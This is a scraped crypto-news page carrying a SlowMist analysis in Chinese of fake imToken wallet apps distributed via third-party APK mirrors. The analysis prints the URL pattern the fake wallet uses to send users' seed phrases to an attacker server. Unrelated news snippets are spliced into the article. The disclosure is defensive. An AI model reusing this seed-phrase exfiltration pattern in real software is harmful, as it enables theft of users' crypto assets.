以太幣交易所 以太幣交易所
Ctrl+D 以太幣交易所
ads
首頁 > Fil > Info

慢霧:Web3假錢包第三方源調查分析_WEB

Author:

Time:1900/1/1 0:00:00

原文作者:?山&耀

技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。

慢霧:近期出現新的流行惡意盜幣軟件Mystic Stealer,可針對40款瀏覽器、70款瀏覽器擴展進行攻擊:6月20日消息,慢霧首席信息安全官@IM_23pds在社交媒體上發文表示,近期已出現新的加密貨幣盜竊軟件Mystic Stealer,該軟件可針對40款瀏覽器、70款瀏覽器擴展、加密貨幣錢包進行攻擊,如MetaMask、Coinbase Wallet、Binance、Rabby Wallet、OKX Wallet、OneKey等知名錢包,是目前最流行的惡意軟件,請用戶注意風險。[2023/6/20 21:49:05]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

慢霧:警惕QANX代幣的雙花攻擊風險:據慢霧區消息,近期存在惡意用戶利用QANX代幣的轉賬鎖定、解鎖功能(transferLocked/unlock)觸發的事件記錄與正常使用transfer功能轉賬觸發的Transfer事件記錄相同而進行雙花攻擊。

慢霧安全團隊建議已上架此幣種的平臺及時自查,未上架的平臺在對接此類幣種時應注意以上風險。

QANX: 0xaaa7a10a8ee237ea61e8ac46c50a8db8bcc1baaa[2022/3/26 14:18:46]

據數據統計站點similarweb統計,apkcombo站點:

全球排名:?1,?809?

國家排名:?7,?370?

品類排名:?168?

慢霧:有用戶遭釣魚攻擊,在OpenSea上架的NFT以極低匹配價格售出:據慢霧消息,有用戶在 OpenSea 掛單售賣的 NFT 被惡意的以遠低于掛單價匹配買。經慢霧安全團隊分析,此是由于該受害用戶遭受釣魚攻擊,錯誤的對攻擊者精心構造的惡意訂單進行簽名,惡意訂單中指定了極低的出售價格、買方地址為攻擊者以及出售 NFT 為受害用戶在 OpenSea 上架的待出售 NFT。攻擊者使用受害用戶已簽名的出售訂單以及攻擊者自己的購買訂單在 OpenSea 中進行匹配,并以攻擊者指定的極低價格成交,導致受害用戶的 NFT 以非預期的價格售出。[2021/12/11 7:31:47]

我們可以看到它的影響力和流量都非常大。

它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

慢霧:Badger DAO黑客已通過renBTC將約1125 BTC跨鏈轉移到10 個BTC地址:12月2日消息,Badger DAO遭遇黑客攻擊,用戶資產在未經授權的情況下被轉移。據慢霧MistTrack分析,截止目前黑客已將獲利的加密貨幣換成 renBTC,并通過renBTC 將約 1125 BTC 跨鏈轉移到 10 個 BTC 地址。慢霧 MistTrack 將持續監控被盜資金的轉移。[2021/12/2 12:46:11]

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?

我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:

https://play.google.com/store/apps/details??id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。

而apkcombo鏡像站的下載路徑為:

https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11?,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3?,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown

下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助記詞>

看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03?,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

1?/imToken錢包:https://token.im/

2?/TokenPocket錢包:https://www.tokenpocket.pro/

3?/TronLink錢包:https://www.tronlink.org/

4?/比特派錢包:https://bitpie.com/

5?/MetaMask錢包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags:WEBCOMTOKENTOKWebflix Tokendefi communitySHIWBAWITCH TOKENTokencan

Fil
美國破產法官確定Celsius破產處理相關時間表:提出動議進行實質性合并的截止日期為5月1日_NET

4月25日消息,美國破產法官MartinGlenn發布一份關于CelsiusNetwork的法律文件,并確定了一份時間表.

1900/1/1 0:00:00
BKEX關于Staking下架ETH、XETH礦池的公告_KEX

尊敬的用戶:?? 為支持XETH兌換ETH,BKEX將下架ETH、XETH-Staking鎖倉挖礦業務.

1900/1/1 0:00:00
ATOM 價格預測——加密社區正在購買ENJ 和COLT_COL

隨著加密貨幣市場的擴大,許多新項目旨在產生影響。其中之一是Collat??eralNetwork(COLT),其預售大獲成功,因為COLT在這一階段的增長預測預計為3500%.

1900/1/1 0:00:00
海量權益+USDT獎勵,CoinW開啟第二輪交易員全球招募_COIN

在經歷2022年疲軟之后,加密市場在2023年第一季度有所復蘇,使加密貨幣處于一個小型牛市的邊緣,投資者的參與性不斷提升。而合約交易因具備“以小博大”和“雙向交易”等優勢受到更多用戶的參與.

1900/1/1 0:00:00
DCT生態系統:在區塊鏈和AI技術的驅動下推動數字經濟_DCT

數字貨幣和區塊鏈技術正在改變現代經濟的面貌,而DCT生態系統則是這種變革的一個重要組成部分。DriveCapital認識到當前區塊鏈和人工智能形式的發展趨勢,以全球性社區為基石發行了全新的數字代.

1900/1/1 0:00:00
穿越黑暗森林:MEV回顧與展望_MEV

原文作者:EigenPhi原文編譯:PengSUN,ForesightNews*注:本報告計算的清算交易統計范圍為2022年5月至12月,其余類型統計范圍為2022年全年.

1900/1/1 0:00:00
ads